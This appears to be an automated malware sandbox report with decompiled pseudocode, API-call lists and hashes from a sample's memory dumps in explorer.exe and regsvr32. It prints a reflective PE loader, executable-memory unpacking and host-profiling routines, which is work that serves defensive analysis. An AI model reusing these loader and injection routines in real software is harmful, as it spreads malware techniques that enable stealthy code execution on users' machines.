                  						_t76 = _t272 + 0x6c;
                  						 *_t76 =  *(_t272 + 0x6c) + _t225;
                  						__eflags =  *_t76;
                  						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                  						_t184 =  *_t78;
                  						_t79 = _t272 + 0x2c; // 0x8df075ff
                  						_t239 =  *_t79;
                  					} else {
                  						 *(_t272 + 0x16b0) = 2;
                  						_t61 = _t272 + 0x38; // 0xf47d8bff
                  						memcpy( *_t61,  *_t142 - _t224, _t224);
                  						_t62 = _t272 + 0x2c; // 0x8df075ff
                  						_t184 =  *_t62;
                  						_t273 = _t273 + 0xc;
                  						_t225 = _a4;
                  						_t239 = _t184;
                  						 *(_t272 + 0x6c) = _t184;
                  					}
                  					_t254 = _t184;
                  					 *(_t272 + 0x5c) = _t184;
                  					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                  					_t185 =  *_t81;
                  					_t240 = _t239 - _t185;
                  					_t241 =  <=  ? _t225 : _t240;
                  					_t242 = ( <=  ? _t225 : _t240) + _t185;
                  					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                  				}
                  				if( *(_t272 + 0x16c0) < _t254) {
                  					 *(_t272 + 0x16c0) = _t254;
                  				}
                  				if(_t269 == 0) {
                  					_t218 = _a8;
                  					__eflags = _t218;
                  					if(_t218 == 0) {
                  						L34:
                  						_t89 = _t272 + 0x3c; // 0x830cc483
                  						_t219 =  *_t272;
                  						_t145 =  *_t89 - _t254 - 1;
                  						_a4 =  *_t272;
                  						_t234 = _t254;
                  						_v16 = _t145;
                  						_v8 = _t254;
                  						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                  						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                  							_v8 = _t254;
                  							_t95 = _t272 + 0x5c; // 0x84e85000
                  							_a4 = _t219;
                  							_t234 = _t254;
                  							_t97 = _t272 + 0x2c; // 0x8df075ff
                  							__eflags =  *_t95 -  *_t97;
                  							if( *_t95 >=  *_t97) {
                  								_t98 = _t272 + 0x2c; // 0x8df075ff
                  								_t167 =  *_t98;
                  								_t259 = _t254 - _t167;
                  								_t99 = _t272 + 0x38; // 0xf47d8bff
                  								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                  								 *(_t272 + 0x6c) = _t259;
                  								memcpy( *_t99, _t167 +  *_t99, _t259);
                  								_t103 = _t272 + 0x16b0; // 0xdf750008
                  								_t170 =  *_t103;
                  								_t273 = _t273 + 0xc;
                  								__eflags = _t170 - 2;
                  								if(_t170 < 2) {
                  									_t172 = _t170 + 1;
                  									__eflags = _t172;
                  									 *(_t272 + 0x16b0) = _t172;
                  								}
                  								_t106 = _t272 + 0x2c; // 0x8df075ff
                  								_t145 = _v16 +  *_t106;
                  								__eflags = _t145;
                  								_a4 =  *_t272;
                  								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                  								_t234 =  *_t108;
                  								_v8 = _t234;
                  							}
                  						}
                  						_t255 = _a4;
                  						_t220 =  *((intOrPtr*)(_a4 + 4));
                  						__eflags = _t145 - _t220;
                  						_t221 =  <=  ? _t145 : _t220;
                  						_t146 = _t221;
                  						_a4 = _t221;
                  						_t222 = _a8;
                  						__eflags = _t146;
                  						if(_t146 != 0) {
                  							_t114 = _t272 + 0x38; // 0xf47d8bff
                  							E00094C30(_t255,  *_t114 + _v8, _t146);
                  							_t273 = _t273 + 0xc;
                  							_t117 = _t272 + 0x6c;
                  							 *_t117 =  *(_t272 + 0x6c) + _a4;
                  							__eflags =  *_t117;
                  							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                  							_t234 =  *_t119;
                  						}
                  						__eflags =  *(_t272 + 0x16c0) - _t234;
                  						if( *(_t272 + 0x16c0) < _t234) {
                  							 *(_t272 + 0x16c0) = _t234;
                  						}
                  						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                  						_t123 = _t272 + 0xc; // 0x452bf84d
                  						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                  						__eflags = _t257 - 0xffff;
                  						_t258 =  >  ? 0xffff : _t257;
                  						_t124 = _t272 + 0x2c; // 0x8df075ff
                  						_t151 =  *_t124;
                  						_t125 = _t272 + 0x5c; // 0x84e85000
                  						_t235 = _t234 -  *_t125;
                  						__eflags = _t258 - _t151;
                  						_t152 =  <=  ? _t258 : _t151;
                  						__eflags = _t235 - ( <=  ? _t258 : _t151);
                  						if(_t235 >= ( <=  ? _t258 : _t151)) {
                  							L49:
                  							__eflags = _t235 - _t258;
                  							_t154 =  >  ? _t258 : _t235;
                  							_a4 =  >  ? _t258 : _t235;
                  							__eflags = _t222 - 4;
                  							if(_t222 != 4) {
                  								L53:
                  								_t269 = 0;
                  								__eflags = 0;
                  							} else {
                  								_t161 =  *_t272;
                  								__eflags =  *(_t161 + 4);
                  								_t154 = _a4;
                  								if( *(_t161 + 4) != 0) {
                  									goto L53;
                  								} else {
                  									__eflags = _t154 - _t235;
                  									if(_t154 != _t235) {
                  										goto L53;
                  									} else {
                  										_t269 = _t222 - 3;
                  									}
                  								}
                  							}
                  							_t131 = _t272 + 0x38; // 0xf47d8bff
                  							_t132 = _t272 + 0x5c; // 0x84e85000
                  							E00095D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                  							_t134 = _t272 + 0x5c;
                  							 *_t134 =  *(_t272 + 0x5c) + _a4;
                  							__eflags =  *_t134;
                  							E00094AF0( *_t134,  *_t272);
                  						} else {
                  							__eflags = _t235;
                  							if(_t235 != 0) {
                  								L46:
                  								__eflags = _t222;
                  								if(_t222 != 0) {
                  									_t162 =  *_t272;
                  									__eflags =  *(_t162 + 4);
                  									if( *(_t162 + 4) == 0) {
                  										__eflags = _t235 - _t258;
                  										if(_t235 <= _t258) {
                  											goto L49;
                  										}
                  									}
                  								}
                  							} else {
                  								__eflags = _t222 - 4;
                  								if(_t222 == 4) {
                  									goto L46;
                  								}
                  							}
                  						}
                  						asm("sbb edi, edi");
                  						_t271 =  ~_t269 & 0x00000002;
                  						__eflags = _t271;
                  						return _t271;
                  					} else {
                  						__eflags = _t218 - 4;
                  						if(_t218 == 4) {
                  							goto L34;
                  						} else {
                  							_t173 =  *_t272;
                  							__eflags =  *(_t173 + 4);
                  							if( *(_t173 + 4) != 0) {
                  								goto L34;
                  							} else {
                  								_t88 = _t272 + 0x5c; // 0x84e85000
                  								__eflags = _t254 -  *_t88;
                  								if(_t254 !=  *_t88) {
                  									goto L34;
                  								} else {
                  									return 1;
                  								}
                  							}
                  						}
                  					}
                  				} else {
                  					return 3;
                  				}
                  			}

                  APIs
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: memcpy
                  • String ID:
                  • API String ID: 3510742995-0
                  • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction ID: 185e7931b200b5f00758bf730992471f6333a59919987fd71983e5a0ce0181f8
                  • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                  • Instruction Fuzzy Hash: 74D11271A00B049FCB68CF69D8D4AAAB7F1FF88304B24892DE88AC7741D771E9449B54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 52%
                  			E00092AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                  				signed int _v5;
                  				signed short _v12;
                  				intOrPtr* _v16;
                  				signed int* _v20;
                  				intOrPtr _v24;
                  				unsigned int _v28;
                  				signed short* _v32;
                  				struct HINSTANCE__* _v36;
                  				intOrPtr* _v40;
                  				signed short* _v44;
                  				intOrPtr _v48;
                  				unsigned int _v52;
                  				intOrPtr _v56;
                  				_Unknown_base(*)()* _v60;
                  				signed int _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				unsigned int _v76;
                  				intOrPtr _v80;
                  				signed int _v84;
                  				intOrPtr _v88;
                  				signed int _t149;
                  				void* _t189;
                  				signed int _t194;
                  				signed int _t196;
                  				intOrPtr _t236;
                  
                  				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                  				_v24 = _v72;
                  				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                  				_v56 = _t236;
                  				if(_t236 == 0) {
                  					L13:
                  					while(0 != 0) {
                  					}
                  					_push(8);
                  					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                  						L35:
                  						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                  						while(0 != 0) {
                  						}
                  						if(_a12 != 0) {
                  							 *_a12 = _v68;
                  						}
                  						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                  						return _v68(_a4, 1, _a8);
                  					}
                  					_v84 = 0x80000000;
                  					_t149 = 8;
                  					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                  					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                  						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                  						if(_v36 == 0) {
                  							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                  						}
                  						if(_v36 != 0) {
                  							if( *_v16 == 0) {
                  								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                  							} else {
                  								_v20 =  *_v16 + _a4;
                  							}
                  							_v64 = _v64 & 0x00000000;
                  							while( *_v20 != 0) {
                  								if(( *_v20 & _v84) == 0) {
                  									_v88 =  *_v20 + _a4;
                  									_v60 = GetProcAddress(_v36, _v88 + 2);
                  								} else {
                  									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                  								}
                  								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                  									 *_v20 = _v60;
                  								} else {
                  									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                  								}
                  								_v20 =  &(_v20[1]);
                  								_v64 = _v64 + 4;
                  							}
                  							_v16 = _v16 + 0x14;
                  							continue;
                  						} else {
                  							_t189 = 0xfffffffd;
                  							return _t189;
                  						}
                  					}
                  					goto L35;
                  				}
                  				_t194 = 8;
                  				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                  				_t196 = 8;
                  				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                  				while(0 != 0) {
                  				}
                  				while(_v48 > 0) {
                  					_v28 = _v44[2];
                  					_v48 = _v48 - _v28;
                  					_v28 = _v28 - 8;
                  					_v28 = _v28 >> 1;
                  					_v32 =  &(_v44[4]);
                  					_v80 = _a4 +  *_v44;
                  					_v52 = _v28;
                  					while(1) {
                  						_v76 = _v52;
                  						_v52 = _v52 - 1;
                  						if(_v76 == 0) {
                  							break;
                  						}
                  						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                  						_v12 =  *_v32 & 0xfff;
                  						_v40 = (_v12 & 0x0000ffff) + _v80;
                  						if((_v5 & 0x000000ff) != 3) {
                  							if((_v5 & 0x000000ff) == 0xa) {
                  								 *_v40 =  *_v40 + _v56;
                  							}
                  						} else {
                  							 *_v40 =  *_v40 + _v56;
                  						}
                  						_v32 =  &(_v32[1]);
                  					}
                  					_v44 = _v32;
                  				}
                  				goto L13;
                  			}

                  APIs
                  • GetModuleHandleA.KERNEL32(?), ref: 00092C4C
                  • LoadLibraryA.KERNEL32(?), ref: 00092C65
                  • GetProcAddress.KERNEL32(00000000,890CC483), ref: 00092CC1
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00092CE0
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 384173800-0
                  • Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
                  • Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
                  • Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 75%
                  			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
                  				char _v16;
                  				intOrPtr _v20;
                  				char _v24;
                  				char _v28;
                  				void* _t13;
                  				intOrPtr _t15;
                  				signed int _t16;
                  				intOrPtr _t17;
                  				signed int _t18;
                  				char _t20;
                  				intOrPtr _t22;
                  				void* _t23;
                  				void* _t24;
                  				intOrPtr _t29;
                  				intOrPtr _t35;
                  				intOrPtr _t41;
                  				intOrPtr _t43;
                  				intOrPtr _t48;
                  				void* _t51;
                  				signed int _t61;
                  				signed int _t64;
                  				void* _t71;
                  
                  				_t71 = __fp0;
                  				_t61 = __ecx;
                  				_t41 =  *0x9e6dc; // 0x1d4
                  				_t13 = E0008A4BF(_t41, 0);
                  				while(_t13 < 0) {
                  					E0008980C( &_v28);
                  					_t43 =  *0x9e6e0; // 0x0
                  					_t15 =  *0x9e6e4; // 0x0
                  					_t41 = _t43 + 0xe10;
                  					asm("adc eax, ebx");
                  					__eflags = _t15 - _v24;
                  					if(__eflags > 0) {
                  						L9:
                  						_t16 = 0xfffffffe;
                  						L13:
                  						return _t16;
                  					}
                  					if(__eflags < 0) {
                  						L4:
                  						_t17 =  *0x9e684; // 0xe7f8f0
                  						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
                  						__eflags = _t18;
                  						if(_t18 == 0) {
                  							break;
                  						}
                  						_t35 =  *0x9e684; // 0xe7f8f0
                  						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                  						_t41 =  *0x9e6dc; // 0x1d4
                  						__eflags = 0;
                  						_t13 = E0008A4BF(_t41, 0);
                  						continue;
                  					}
                  					__eflags = _t41 - _v28;
                  					if(_t41 >= _v28) {
                  						goto L9;
                  					}
                  					goto L4;
                  				}
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t20 =  *0x9e6e8; // 0xe7ffa8
                  				_v28 = _t20;
                  				_t22 = E0008A6A9(_t41, _t61,  &_v16);
                  				_v20 = _t22;
                  				if(_t22 != 0) {
                  					_t23 = GetCurrentProcess();
                  					_t24 = GetCurrentThread();
                  					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
                  					E0008980C(0x9e6e0);
                  					_t64 = E00081A1B( &_v28, E00081226, _t71);
                  					__eflags = _t64;
                  					if(_t64 >= 0) {
                  						_push(0);
                  						_push( *0x9e760);
                  						_t51 = 0x27;
                  						E00089F06(_t51);
                  					}
                  				} else {
                  					_t64 = _t61 | 0xffffffff;
                  				}
                  				_t29 =  *0x9e684; // 0xe7f8f0
                  				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
                  				_t48 =  *0x9e6dc; // 0x1d4
                  				 *0x9e6d0 = 0;
                  				E0008A4DB(_t48);
                  				E0008861A( &_v24, 0);
                  				_t16 = _t64;
                  				goto L13;
                  			}

                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cb3f63950b04c1ad73a20e986723358a012182b6e37857227db130d42d621313
                  • Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
                  • Opcode Fuzzy Hash: cb3f63950b04c1ad73a20e986723358a012182b6e37857227db130d42d621313
                  • Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E00081B2D(void* __eflags, void* __fp0) {
                  				char _v24;
                  				char _v28;
                  				void* _t12;
                  				intOrPtr _t14;
                  				void* _t15;
                  				intOrPtr _t16;
                  				void* _t17;
                  				void* _t19;
                  				void* _t20;
                  				char _t24;
                  				intOrPtr _t26;
                  				intOrPtr _t28;
                  				intOrPtr _t33;
                  				intOrPtr _t38;
                  				intOrPtr _t40;
                  				void* _t41;
                  				intOrPtr _t46;
                  				void* _t48;
                  				intOrPtr _t51;
                  				void* _t61;
                  				void* _t71;
                  
                  				_t71 = __fp0;
                  				_t38 =  *0x9e6f4; // 0x1d0
                  				_t12 = E0008A4BF(_t38, 0);
                  				while(_t12 < 0) {
                  					E0008980C( &_v28);
                  					_t40 =  *0x9e700; // 0x0
                  					_t14 =  *0x9e704; // 0x0
                  					_t41 = _t40 + 0x3840;
                  					asm("adc eax, ebx");
                  					__eflags = _t14 - _v24;
                  					if(__eflags > 0) {
                  						L13:
                  						_t15 = 0;
                  					} else {
                  						if(__eflags < 0) {
                  							L4:
                  							_t16 =  *0x9e684; // 0xe7f8f0
                  							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
                  							__eflags = _t17;
                  							if(_t17 == 0) {
                  								break;
                  							} else {
                  								_t33 =  *0x9e684; // 0xe7f8f0
                  								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                  								_t51 =  *0x9e6f4; // 0x1d0
                  								__eflags = 0;
                  								_t12 = E0008A4BF(_t51, 0);
                  								continue;
                  							}
                  						} else {
                  							__eflags = _t41 - _v28;
                  							if(_t41 >= _v28) {
                  								goto L13;
                  							} else {
                  								goto L4;
                  							}
                  						}
                  					}
                  					L12:
                  					return _t15;
                  				}
                  				E0008980C(0x9e700);
                  				_t19 = GetCurrentProcess();
                  				_t20 = GetCurrentThread();
                  				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				asm("stosd");
                  				_t24 =  *0x9e6e8; // 0xe7ffa8
                  				_v28 = _t24;
                  				_t61 = E00081A1B( &_v28, E0008131E, _t71);
                  				if(_t61 >= 0) {
                  					_push(0);
                  					_push( *0x9e760);
                  					_t48 = 0x27;
                  					E00089F06(_t48);
                  				}
                  				if(_v24 != 0) {
                  					E00086890( &_v24);
                  				}
                  				_t26 =  *0x9e684; // 0xe7f8f0
                  				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
                  				_t28 =  *0x9e758; // 0x0
                  				 *0x9e6ec = 0;
                  				_t29 =  !=  ? 1 : _t28;
                  				_t46 =  *0x9e6f4; // 0x1d0
                  				 *0x9e758 =  !=  ? 1 : _t28;
                  				E0008A4DB(_t46);
                  				_t15 = _t61;
                  				goto L12;
                  			}

























                  APIs
                  • GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
                  • GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
                  • GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
                  • DuplicateHandle.KERNEL32 ref: 00081BD9
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: Current$Process$DuplicateHandleThread
                  • String ID:
                  • API String ID: 3566409357-0
                  • Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                  • Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
                  • Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
                  • Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:2%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:0%
                  Total number of Nodes:41
                  Total number of Limit Nodes:2


                  Executed Functions

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
                  • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
                  • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
                  • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
                  • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
                  Memory Dump Source
                  • Source File: 00000009.00000002.552120596.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
                  • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
                  • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
                  Memory Dump Source
                  • Source File: 00000009.00000002.552028528.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: DirectoryProtectSystemVirtual
                  • String ID:
                  • API String ID: 648172718-0
                  • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
                  • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Control-flow Graph

                  APIs
                  • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
                  • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.552028528.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: ChangeDirectoryFindFirstNotificationWindows
                  • String ID: 1
                  • API String ID: 3662519435-2212294583
                  • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
                  • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
                  • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
                  • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
                  • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
                  • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
                  • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
                  Memory Dump Source
                  • Source File: 0000000C.00000002.563409743.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_10077000_regsvr32.jbxd
                  Similarity
                  • API ID: Virtual$Protect$Alloc$Free
                  • String ID:
                  • API String ID: 2574235972-0
                  • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
                  • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
                  • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
                  • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
                  Memory Dump Source
                  • Source File: 0000000C.00000002.563376614.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: DirectoryProtectSystemVirtual
                  • String ID:
                  • API String ID: 648172718-0
                  • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
                  • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
                  • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  Control-flow Graph

                  APIs
                  • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
                  • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.563376614.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: ChangeDirectoryFindFirstNotificationWindows
                  • String ID: 1
                  • API String ID: 3662519435-2212294583
                  • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
                  • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
                  • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Executed Functions

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008CF84(void* __ecx) {
                  				intOrPtr _t11;
                  				long _t12;
                  				intOrPtr _t17;
                  				intOrPtr _t18;
                  				struct _OSVERSIONINFOA* _t29;
                  
                  				_push(__ecx);
                  				_t29 =  *0x9e688; // 0xb0000
                  				GetCurrentProcess();
                  				_t11 = E0008BA05(); // executed
                  				_t1 = _t29 + 0x1644; // 0xb1644
                  				_t25 = _t1;
                  				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
                  				_t12 = GetModuleFileNameW(0, _t1, 0x105);
                  				_t33 = _t12;
                  				if(_t12 != 0) {
                  					_t12 = E00088FBE(_t25, _t33);
                  				}
                  				_t3 = _t29 + 0x228; // 0xb0228
                  				 *(_t29 + 0x1854) = _t12;
                  				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
                  				memset(_t29, 0, 0x9c);
                  				_t29->dwOSVersionInfoSize = 0x9c;
                  				GetVersionExA(_t29);
                  				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
                  				_t17 = E0008E3B6(_t3);
                  				_t7 = _t29 + 0x220; // 0xb0220
                  				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
                  				_t18 = E0008E3F1(_t7); // executed
                  				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
                  				return _t18;
                  			}









                  APIs
                  • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
